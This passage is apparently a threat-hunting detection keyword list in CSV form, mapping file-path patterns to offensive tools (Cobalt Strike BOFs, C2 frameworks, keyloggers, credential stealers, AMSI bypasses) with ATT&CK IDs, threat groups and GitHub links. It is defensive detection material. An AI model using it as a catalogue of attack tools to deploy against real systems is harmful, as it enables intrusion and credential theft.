?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/theHarvester.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/ThemeBleed.exe*,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z -*/thief.py*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*/thirdparty/msf/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/ThisIsNotRat.git*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,1,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*/thoth.git*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/ThreadlessInject.git*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,1,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*/ThreatCheck.git*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*/ThunderDNS*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*/ticketConverter.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/ticketer.py -*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*/ticketer.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*/ticketsplease.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*/TikiLoader/*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*/TikiSpawn.*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*/TikiSpawn/*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*/timeoutpwn64*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/timestomp.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/timestomping.ps1*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/timwr/CVE-2016-5195*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,1,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*/tinar.py*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,0,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*/tls-alpn.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tls-nextprotoneg.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tls-ticketbleed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tmmmp *,offensive_tool_keyword,OMGLogger,Key logger which sends each and every key stroke of target remotely/locally.,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*/tmp/*-passwords.txt*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,0,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z -*/tmp/*-usernames.txt*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,0,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z -*/tmp/.manspider*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/tmp/amass.zip*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/bin/csprecon*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/bin/subfinder*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/c2-rebind.so*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/tmp/chimera.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/tmp/dcow *,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,0,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*/tmp/FavFreak/*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/geckodriver.tar.gz*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/gitleaks*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/host.ghost*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,0,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/tmp/mac.ghost*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,0,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/tmp/metadata/na.elf*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*/tmp/metasploit_install*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/tmp/p0f.log*,offensive_tool_keyword,p0f,P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications,T1046 - T1040,TA0007 - TA0010,N/A,N/A,Sniffing & Spoofing,https://www.kali.org/tools/p0f/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tmp/payload.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/tmp/scanrepo.tar.gz*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/truffleHog.tar.gz*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/vt-post-*.txt*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/tmp/vt-results-*.txt*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/tmp/wordlist.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*/tn3270-screen.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/TokenStealing*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*/TokenStripBOF*,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,1,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -*/TokenTactics.git*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*/Tokenvator/*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*/tomcat-RH-root.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/tools/BeaconTool/*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/tools/DHCP.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/tools/psexec.rb*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/Tools/spoolsystem/*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 